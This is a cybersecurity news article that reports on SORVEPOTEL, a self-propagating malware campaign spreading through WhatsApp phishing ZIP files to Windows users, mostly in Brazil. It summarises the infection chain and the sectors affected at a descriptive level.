New Malware Threat Targets Brazilian WhatsApp Users
Brazilian users are facing a serious cybersecurity threat from a new self-propagating malware that spreads through WhatsApp. This campaign, identified by security researchers under the name SORVEPOTEL, exploits the inherent trust that users place in the messaging app to propagate quickly across Windows systems. Unlike traditional malware, which often aims for data theft or ransomware, SORVEPOTEL is engineered primarily for rapid spread.
The Mechanics of SORVEPOTEL
Researchers, including Jeffrey Francis Bonaobra and Maristel Policarpio, have detailed how SORVEPOTEL spreads through deceptive phishing messages. These messages often include malicious ZIP file attachments that urge users to open them on their desktop computers. The design of this attack suggests that the perpetrators may indeed be focusing on targeting businesses rather than everyday consumers.
Once a user opens the infected attachment, the malware enters execution mode. From there, it uses the desktop version of WhatsApp to send spam messages to all contacts, ultimately leading to the account being banned due to excessive spamming. Alarmingly, there’s no evidence that personal data is being stolen or that files are encrypted—this is purely about spreading the malware further.
Infection Statistics Reveal Targeted Impact
Most of the malware infections—457 out of the 477 reported cases—are concentrated in Brazil. A variety of sectors have been affected, including government, public services, manufacturing, technology, education, and construction. The focal point on Brazil highlights how specific regional threats can significantly affect multiple industries.
Phishing Tactics and Credibility
The initial infection vector for SORVEPOTEL is a phishing message sent from a contact that has already been compromised. This tactic lends an air of authenticity to the communication, making it easier for unsuspecting users to be fooled. The message typically contains a ZIP file that masquerades as an innocent receipt or a file related to health applications.
Interestingly, there is also evidence showing that the campaign is leveraging emails to distribute the malicious ZIP files, making it even more insidious. These emails often appear to be from legitimate sources, further increasing the likelihood that recipients will click on the attachments.
Execution and Malicious Payload
If a recipient falls for the ruse and opens the attachment, they might inadvertently activate a Windows shortcut (LNK) file. This action leads to the silent execution of a PowerShell script, which is responsible for downloading the primary malware payload from an external server, such as sorvetenopate[.]com.
This downloaded script is particularly concerning because it establishes persistence on the infected computer. It ensures that the malware will automatically launch whenever the system starts. Additionally, it executes a PowerShell command that communicates with a command-and-control (C2) server for further instructions or additional components.
WhatsApp Propagation Strategy
The hallmark of SORVEPOTEL is its WhatsApp-centric method of self-propagation. If the malware detects that the victim has WhatsApp Web active on their device, it immediately distributes the malicious ZIP file to all of the user’s contacts and group chats. This rapid dissemination not only increases the chances of further infections but also raises the volume of spam messages being sent.
As a result, many affected accounts are suspended or banned due to violations of WhatsApp’s terms of service. Security experts from Trend Micro express concern over how quickly and effectively threat actors are using popular communication platforms like WhatsApp to distribute malware with minimal involvement from users.
